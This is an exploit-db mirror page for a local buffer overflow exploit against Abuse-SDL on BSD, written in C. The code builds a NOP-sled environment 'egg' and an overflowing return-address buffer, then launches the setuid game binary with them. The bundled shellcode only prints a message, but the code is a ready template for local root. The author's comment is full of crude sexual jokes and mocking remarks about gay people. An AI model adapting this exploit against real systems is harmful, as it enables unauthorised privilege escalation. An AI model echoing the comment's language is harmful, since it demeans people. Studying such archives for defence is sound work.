exploit-db-mirror/exploits/bsd/local/22811.c
Offensive Security 880bbe402e DB: 2019-03-08
14991 changes to exploits/shellcodes

HTC Touch - vCard over IP Denial of Service

TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities

PeerBlock 1.1 - Blue Screen of Death

WS10 Data Server - SCADA Overflow (PoC)

Symantec Endpoint Protection 12.1.4013 - Service Disabling
Memcached 1.4.33 - 'Crash' (PoC)
Memcached 1.4.33 - 'Add' (PoC)
Memcached 1.4.33 - 'sasl' (PoC)
Memcached 1.4.33 - 'Crash' (PoC)
Memcached 1.4.33 - 'Add' (PoC)
Memcached 1.4.33 - 'sasl' (PoC)

Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow

man-db 2.4.1 - 'open_cat_stream()' Local uid=man

CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation

CDRecord's ReadCD - Local Privilege Escalation
Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH)
FreeBSD - Intel SYSRET Privilege Escalation (Metasploit)

CCProxy 6.2 - 'ping' Remote Buffer Overflow

Savant Web Server 3.1 - Remote Buffer Overflow (2)

Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow

Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow
QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit)
Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit)
Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit)
Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass)
TeamCity < 9.0.2 - Disabled Registration Bypass
OpenSSH SCP Client - Write Arbitrary Files
Kados R10 GreenBee - Multiple SQL Injection
WordPress Core 5.0 - Remote Code Execution
phpBB 3.2.3  - Remote Code Execution

Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator)
Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
2019-03-08 05:01:50 +00:00

88 lines
No EOL
3 KiB
C

// source: https://www.securityfocus.com/bid/7982/info
A buffer overflow vulnerability has been reported for Abuse-SDL that may result in the execution of attacker-supplied code. The vulnerability exists due to insufficient bounds checking performed on certain command-line options.
/*
hey all.. this is a l33t 0x36 0day exploit by Matrix_DK :)
This should give root, i give root to by the way,
on all BSD systems with abuse installed.
-r-xr-xr-x 1 root wheel 675344 Jun 18 13:37
hi hi owned by root group wheel.. this is a hacker goodie
I hoped abuse was my favorite game assabuse portet to unix..
so i tried to load pics of my boyfriend johnlw ass into the game
using -datadir... but the program died???
could this be exploitet???
i tried to exploit this myself, but i have no skillz. So i
asked the other gays from 0x36, but there did not know how
to do this hardcore command line overflows.
I asked inv, but he told me to go ass fuck casto... inv is l33t
he knows many exploit tricks.. he is my hero..
So i had to steal some code from
'smashing the stack for fun and profit' to get it to work...
but now i have become a hacker i am going to send out many
advisories so other people know im a hacker.. and one day maybe if
i am lucky i can send out some exploits to.. but i have to get some
unix, debug and code skillz first...
i have made the shellcode myself.. look how l33t it is, it prints
'what is the matrix ?' :).. that is cool.. us real hackers love the
matrix, we jerk off to trinity in slow motion, and use nicks from
the movie.
*/
#include <stdlib.h>
#define DEFAULT_BUFFER_SIZE 350
#define DEFAULT_EGG_SIZE 2048
#define NOP 0x90
char shellcode[] = "\x31\xc0\x50\x68\x69\x78\x20\x3f\x68\x6d"
"\x61\x74\x72\x68\x74\x68\x65\x20\x68\x20"
"\x69\x73\x20\x68\x77\x68\x61\x74\x89\xe3"
"\x6a\x14\x53\x50\x50\xb0\x04\xcd\x80\x31"
"\xc0\xb0\x01\xcd\x80";
unsigned long get_esp(void) {
__asm__("movl %esp,%eax");
}
int main() {
char *buff, *ptr, *egg;
long *addr_ptr, addr;
int bsize=DEFAULT_BUFFER_SIZE;
int i, eggsize=DEFAULT_EGG_SIZE;
addr = get_esp();
buff = malloc(bsize);
egg = malloc(eggsize);
ptr = buff;
addr_ptr = (long *) ptr;
for (i = 0; i < bsize; i+=4)
*(addr_ptr++) = addr;
ptr = egg;
for (i = 0; i < eggsize - strlen(shellcode) - 1; i++)
*(ptr++) = NOP;
for (i = 0; i < strlen(shellcode); i++)
*(ptr++) = shellcode[i];
buff[bsize - 1] = '\0';
egg[eggsize - 1] = '\0';
memcpy(egg,"EGG=",4);
putenv(egg);
memcpy(buff,"RET=",4);
putenv(buff);
system("/usr/local/bin/abuse.sdl -datadir $RET");
}